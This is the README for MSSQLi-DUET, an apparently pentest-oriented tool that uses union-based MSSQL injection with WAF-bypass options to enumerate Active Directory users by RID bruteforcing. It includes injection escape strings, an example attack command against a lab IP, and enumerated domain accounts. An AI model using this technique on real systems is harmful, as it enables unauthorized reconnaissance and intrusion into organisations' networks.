Keramas / Mssqli Duet

SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing

MSSQLi-DUET - MSSQL Injection-based Domain User Enumeration Tool

SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing. Supports various forms of WAF bypass techniques through the implementation of SQLmap tamper functions. Additional tamper functions can be incorporated by the user depending on the situation and environment.

Comes in two flavors: straight-up Python script for terminal use, or a Burp Suite plugin for simple GUI navigation.

Currently only union-based injection is supported. More samples and test cases are required to fully test the tool's functionality and accuracy. Feedback and comments are greatly welcomed if you encounter a situation in which it does not work.

Custom tailoring the script and plugin to your needs should not be too difficult either. Be sure to read the Notes section for some troubleshooting.

Burp Suite Plugin

After loading the plugin into Burp Suite, right-click on a request and send it to MSSQLi-DUET. More details on the parameters and such are described below.

The request will populate in the request window, and only the fields above it need to be filled out. After hitting Run, the output will be placed in the results output box for easy copy-pasting.

Python Script Usage

Script Help

python3 mssqli-duet.py -h
usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid
                      RID_RANGE [-ssl SSL] -p PARAMETER [-proxy PROXY]
                      [-o OUTFILE] -r REQUEST_FILE

MSSQLi-DUET - MSSQL (Injection-based) Domain User Enumeration Tool

optional arguments:
  -h, --help            show this help message and exit
  -i INJECTION, --injection INJECTION
                        Injection point. Provide only the data needed to
                        escape the query.
  -e ENCODING, --encoding ENCODING
                        Type of encoding: unicode, doubleencode, unmagicquotes
  -t TIME_DELAY, --time_delay TIME_DELAY
                        Time delay for requests.
  -rid RID_RANGE, --rid_range RID_RANGE
                        Hypenated range of RIDs to bruteforce. Ex: 1000-1200
  -ssl SSL, --ssl SSL   Add flag for HTTPS
  -p PARAMETER, --parameter PARAMETER
                        Vulnerable parameter
  -proxy PROXY, --proxy PROXY
                        Proxy connection string. Ex: 127.0.0.1:8080
  -o OUTFILE, --outfile OUTFILE
                        Outfile for username enumeration results.
  -r REQUEST_FILE, --request_file REQUEST_FILE
                        Raw request file saved from Burp

Prepare to be enumerated!

How to use

After identifying a union-based SQL injection in an application, copy the raw request from Burp Suite using the 'copy to file' feature.

Pass the saved request to DUET with the -r flag. Specify the vulnerable parameter as well as the point of injection. As an example, if the parameter "element" is susceptible to SQL injection, -p will be "element". DUET will build out all the SQL injection queries automatically, but the initial injection must be specified by hand. Meaning, if the injection occurs because of a single apostrophe after the parameter data, this is what would be specified for the -i argument.

Ex: test' 
    test'))
    test")"

Example

python3 mssqli-duet.py -i "carbon'" -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080
[+] Collected request data:
Target URL = http://192.168.11.22/search2.php?element=carbon
Method = GET
Content-Type = applcation/x-www-form-urlencoded


[+] Determining the number of columns in the table...
        [!] Number of columns is  3
[+] Determining column type...
        [!] Column type is null
[+] Discovering domain name...
        [+] Domain = NEUTRINO
[+] Discovering domain SID...
S-1-5-21-4142252318-1896537706-4233180933-

[+] Enumerating Active Directory via SIDs...

NEUTRINO\HYDROGENDC01$
NEUTRINO\DnsAdmins
NEUTRINO\DnsUpdateProxy
NEUTRINO\HELIUM$
NEUTRINO\BORON$
NEUTRINO\BERYLLIUM$
NEUTRINO\aeinstein
NEUTRINO\bbobberson
NEUTRINO\csagan
NEUTRINO\ccheese
NEUTRINO\svc_web
NEUTRINO\svc_sql

Notes

The script may need to be modified depending on the casting and type limitations of the columns that are discovered.
This includes modifications to switch the column position of the payload, and also modifying the query strings themselves to account for column types that will not generate errors.

Additionally, the logic for determining the number of columns is currently not the greatest, and certain comparisons may need to be commented out to ensure proper determination takes place.

Overall, just take a look at the requests being sent in Burp and tailor the script as necessary to the SQL injection environment you find yourself in.

References

https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/